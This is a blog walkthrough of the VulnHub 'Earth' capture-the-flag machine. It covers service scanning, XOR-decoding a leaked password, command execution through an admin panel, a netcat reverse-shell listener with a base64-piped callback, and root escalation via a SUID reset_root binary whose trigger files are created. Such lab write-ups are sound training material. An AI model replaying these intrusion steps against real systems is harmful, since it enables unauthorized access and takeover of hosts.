26 May 2022

Pentesting Fun Stuff

following the cyber security path…

Earth

Introduction

This is a challenge from vulnhub.com created by SirFlash.
According to the description on Vulnhub:

Difficulty: Easy

Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.

Enumeration

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-title: Bad Request (400)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Issuer: commonName=earth.local/stateOrProvinceName=Space
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-10-12T23:26:31
| Not valid after:  2031-10-10T23:26:31
| MD5:   4efa 65d2 1a9e 0718 4b54 41da 3712 f187
|_SHA-1: 04db 5b29 a33f 8076 f16b 8a1b 581d 6988 db25 7651
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9

SSH, a webserver and 2 domain names. The domain names go into the /etc/hosts file.

https://terratest.earth.local shows: Test site, please ignore.
Nothing more. A little dirb goes a long way:

https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)
https://terratest.earth.local/index.html (CODE:200|SIZE:26)
https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)

A robots.txt file

User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

Testingnotes.* looks interesting.
A first guess is .txt and I get:

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

A few things that are interesting:

XOR is used for encryption
There is a file called ‘testdata.txt’ that was used for testing the encryption
‘terra’ is a valid username

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

That’s a long key to use for XOR, but why not?
https://earth.local gives:

So now I have some coded text, an encryption algoritme and a key.
There are several tools to use like CyberChef. This time I’m going for a very nice website called dcode.fr
After combining the codetext and the key, I got the plaintext that should be a password. On to the main page of the website.

Gobuster found some pages on the website:

http://earth.local/cgi-bin/ (Status: 403) [Size: 199]
http://earth.local/icons/ (Status: 200) [Size: 74416]
http://earth.local/static/ (Status: 403) [Size: 199]
http://earth.local/admin/ (Status: 200) [Size: 306]

Let’s try the found credentials on the admin page.
It worked and I got this page:

Let’s try the command `id`

Command output: uid=48(apache) gid=48(apache) groups=48(apache)

But this is really annoying, so need to get a reverse shell.
To do this I start a netcat listener from my end:

$ sudo nc -lvnp 8080
[sudo] password for user: 
listening on [any] 8080 ...

Then I use the command to connect netcat to my listener…………..but that didn’t work.
It seems that I get an error, but that is not getting through as output.
So I need to adjust my command so it won’t trigger an error.
The way to do that is to encode the command with base64 and then use that as input.
Off course you need to decode the string on the target machine and then pipe it to bash.

connect to [192.168.202.130] from (UNKNOWN) [192.168.202.129] 60214
id
uid=48(apache) gid=48(apache) groups=48(apache)
python -c 'import pty;pty.spawn("/bin/bash");'
bash-5.1$ 

There is a user called Earth, but its home dir is off limit for now.
Looking for some misconfigurations I found a file with the SUID flag set.

bash-5.1$ find / -perm -4000 -type f 2>/dev/null
find / -perm -4000 -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

Reset_root seems interesting. It’s a binary and when running the file there is an error:

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

Let’s see what’s inside this binary the easy way with `strings`:

/lib64/ld-linux-x86-64.so.2
setuid
puts
system
access
__libc_start_main
libc.so.6
GLIBC_2.2.5
__gmon_start__
H=@@@
paleblueH
]\UH
credentiH
als rootH
:theEartH
hisflat
[]A\A]A^A_
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
/usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
;*3$"
GCC: (GNU) 11.1.1 20210531 (Red Hat 11.1.1-3)
:

So if this binary is run correctly, the new root password is Earth. But with strings, I can’t get to know what those triggers are. There is another tool you can use: `ltrace`.
But it is not installed on the target machine.
So I need to transfer the file to my local machine. You can do this with netcat.

After transferring the file, I use ltrace to see what those triggers are.

$ ltrace ./reset_root 
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)                                                                                       = 38
access("/dev/shm/kHgTFI5G", 0)                                                                                               = -1
access("/dev/shm/Zw7bV9U5", 0)                                                                                                    = -1
access("/tmp/kcM0Wewe", 0)                                                                                                        = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)                                                                                       = 44
+++ exited (status 0) +++

So I need to create some files on the target machine.

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe

Now for running the file again:

bash-5.1$ /usr/bin/reset_root
/usr/bin/reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
bash-5.1$ su root
su root
Password: Earth

[root@earth terratest.earth.local]#

Got root.

[root@earth ~]# cat root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

And that was Earth.
A nice challenge that was indeed on the harder side of easy.

I see that I forgot to look for the user flag.
But looking at the root flag, I think I know what to look for:

[root@earth ~]# cat /var/earth_web/user_flag.txt              
cat /var/earth_web/user_flag.txt
[user_flag_3353b67d6437f07ba7d34afd7d2fc27d]

Now it’s really done 🙂

Leave a Reply

Your email address will not be published.

This site uses Akismet to reduce spam. Learn how your comment data is processed.